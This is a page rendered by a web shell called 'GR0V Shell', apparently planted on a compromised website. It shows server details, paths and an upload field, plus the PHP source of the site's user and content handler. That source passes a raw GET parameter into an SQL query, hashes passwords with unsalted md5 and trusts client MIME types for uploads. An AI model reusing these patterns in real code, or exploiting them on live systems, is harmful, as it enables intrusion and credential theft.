? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/modules/users/
File Upload :
Current File : /home/admin/public_html/modules/users/user.server.php

<?php

function AddData($formData)
{
	global $db,$user_login,$cfg;
    $objResponse = new xajaxResponse();
	$error=Array();

   if($formData['username']==''){
  			$objResponse->addAlert("กรอก username ค่ะ");
 			array_push($error,"error");
  			$objResponse->addScript("document.getElementById('username').focus();");
  			$objResponse->addAssign("username","style.backgroundColor", "#caf632");
			return $objResponse->getXML();
	}else{	
			$objResponse->addAssign("username","style.backgroundColor", "#ffffff");
	}
	if($formData['password']==''){
  			$objResponse->addAlert("กรอก password ด้วยค่ะ");
 			array_push($error,"error");
  			$objResponse->addScript("document.getElementById('password').focus();");
  			$objResponse->addAssign("password","style.backgroundColor", "#caf632");
			return $objResponse->getXML();
	}else{	
			$objResponse->addAssign("password","style.backgroundColor", "#ffffff");
	}
	
	if($formData['password'] != $formData['password2'] ){
		  $objResponse->addAlert("กรอก password ให้ตรงด้วยค่ะ");
		  array_push($error,"error");

		  $objResponse->addScript("document.getElementById('password2').focus();");
  			$objResponse->addAssign("password2","style.backgroundColor", "#caf632");
		  return $objResponse->getXML();
	}else{	

		 $objResponse->addAssign("password2","style.backgroundColor", "#ffffff");
	}
	if($formData['name'] =='' ){
		  $objResponse->addAlert("กรอก name ด้วยค่ะ");
		  array_push($error,"error");

		  $objResponse->addScript("document.getElementById('name').focus();");
  			$objResponse->addAssign("name","style.backgroundColor", "#caf632");
		  return $objResponse->getXML();
	}else{	

		 $objResponse->addAssign("name","style.backgroundColor", "#ffffff");
	}

	
	
if(!in_array("error",$error)){	


	$password=md5($formData['password']);
	$addarr=array(
		  'user_login'=>$formData['username'],
		  'user_password'=>$password,           
		  'user_name'=>$formData['name'],
		 
		  'user_type'=>$formData['cat_id'],            

		  
	);
	$result=$db->Insert('users',$addarr);
	
	
	if($result){
		$messageError="บันทึกข้อมูลสำเร็จ";
		$objResponse->addAlert($messageError);
		$objResponse->addRedirect("admin.php?mod=user");
		return $objResponse->getXML();
	}else{
		$error="ไม่สามารถเพิ่มข้อมูลได้".$db->mysqlError();
		$objResponse->addAlert($error);
		$objResponse->addRedirect("admin.php?mod=user");
		return $objResponse->getXML();
	}
	
}///end check error

return $objResponse->getXML();
}
$xajax->registerFunction("AddData");


function EditData($formData)
{
	global $db,$user_login,$cfg;
    $objResponse = new xajaxResponse();
	$addarr=array();
	$topic_id=$_GET['id'];
   
	
    $pk=$db->getDataOneRow('contents',$topic_id,'ContentID');
	$error=Array();
	
	if($formData['ContentName']==''){
		$objResponse->addAlert("กรอกชื่อ ContentName ด้วยค่ะ");
		array_push($error,"error");
		$objResponse->addScript("document.getElementById('ContentName').focus();");
		$objResponse->addAssign("ContentName","style.backgroundColor", "#caf632");
		return $objResponse->getXML();
	}else{	
		$objResponse->addAssign("ContentName","style.backgroundColor", "#ffffff");
	}
	if($formData['ContentURL']==''){
		$objResponse->addAlert("กรอก ContentURL ด้วยค่ะ");
		array_push($error,"error");
		$objResponse->addScript("document.getElementById('ContentURL').focus();");
		$objResponse->addAssign("ContentURL","style.backgroundColor", "#caf632");
		return $objResponse->getXML();
	}else{	
		$objResponse->addAssign("ContentURL","style.backgroundColor", "#ffffff");
	}

if(!in_array("error",$error)){
		$filename=$_FILES['ContentPhoto']['name'];
		$filetype=$_FILES['ContentPhoto']['type'];
		$filetmp=$_FILES['ContentPhoto']['tmp_name'];
		if($filename!=''){
		$pic =Random_Int(8).date('dmYHism',time());
			if(file_exists("files/Content/photo/".$pk[ContentPhoto])) {
			unlink("files/Content/photo/".$pk[ContentPhoto]);
			}
			if(file_exists("files/Content/photo/thumbs/".$pk[ContentPhoto])) {
			unlink("files/Content/photo/thumbs/".$pk[ContentPhoto]);
			}
		if ( $filetype == "image/gif" ){$ContentPhoto=$pic.".gif";}
		else if ( $filetype == "image/bmp" ){$ContentPhoto=$pic.".bmp";}
		else if ( $filetype == "image/png" ){$ContentPhoto=$pic.".png";}
		else if (($filetype=="image/jpg")||($filetype=="image/jpeg")||($filetype=="image/pjpeg")){$ContentPhoto=$pic.".jpg";}		
		else{  
		$objResponse->addAlert("ไฟล์รูปผิดพลาด");
		return  $objResponse;
		}
		$addarr['ContentPhoto']=$ContentPhoto;
			if(move_uploaded_file($filetmp,$cfg[abs_path]."/files/Content/photo/".$ContentPhoto)){
				make_thumb($cfg[abs_path]."/files/Content/photo/".$ContentPhoto,$cfg[abs_path]."/files/Content/photo/thumbs/".$ContentPhoto,$new_w=302);
			}
		
		
		}
		if($pk[ContentDetail]==''){
		$detail = htmlspecialchars($formData['ContentDetail']);
	
		}else{
		$detail = htmlspecialchars($formData['ContentDetail']);
		}
		

		$MagazineDate=explode('-',$formData['MagazineDate']);
		$MagazineDate=$MagazineDate[2].$MagazineDate[1].$MagazineDate[0];
		
		$EventStartDate=explode('-',$formData['EventStartDate']);
		$EventStartDate=$EventStartDate[2].$EventStartDate[1].$EventStartDate[0];
	
		$EventEndDate=explode('-',$formData['EventEndDate']);
		$EventEndDate=$EventEndDate[2].$EventEndDate[1].$EventEndDate[0];
		
		$addarr['CatID']	   =			$formData['CatID'];
		$addarr['ContentOrder']		=		$formData['ContentOrder'];
		$addarr['MagazineNumber']	=		$formData['MagazineNumber'];
		$addarr['MagazineDate']		=		$MagazineDate;  
		$addarr['ContentPublic']	=		$formData['ContentPublic'];
		$addarr['ContentCommentPublic']=	$formData['ContentCommentPublic'];   
		$addarr['ContentName']		=		$formData['ContentName'];
		$addarr['ContentMetaTitle']=		$formData['ContentMetaTitle'];         
		$addarr['ContentURL']		=		$formData['ContentURL'];
		$addarr['ContentTitle']		=		$formData['ContentTitle'];
		$addarr['ContentMetaKeyword']=		$formData['ContentMetaKeyword'];       
		$addarr['ContentMetaDescription']=	$formData['ContentMetaDescription'];
		$addarr['ContentTags']	=			$formData['ContentTags'];
		$addarr['ContentHot']	=			$formData['ContentHot'];
		$addarr['ContentView']	=			$formData['ContentView'];
		$addarr['ContentDetail']=			$detail;
		$addarr['ContentEditTime']=			date('Y-m-d H:i:s',time());
		$addarr['EventStartDate']=			$EventStartDate;
		$addarr['EventEndDate']=			$EventEndDate;

		
		$result=$db->Update('contents',$addarr,"WHERE ContentID='$topic_id' ");
		
			if($result){
				$messageError="บันทึกข้อมูลสำเร็จ";
				$objResponse->addAlert($messageError);
				$objResponse->addRedirect("admin.php?mod=content");
				return $objResponse->getXML();
			
			}else{
			
				$error="ไม่สามารถเพิ่มข้อมูลได้".$db->mysqlError();
				$objResponse->addAlert($error);
				//$objResponse->addRedirect("admin.php?mod=Content");
			}
}///end check error
return $objResponse->getXML();
}
$xajax->registerFunction("EditData");
?>

T1KUS90T
  root-grov@210.1.60.28:~$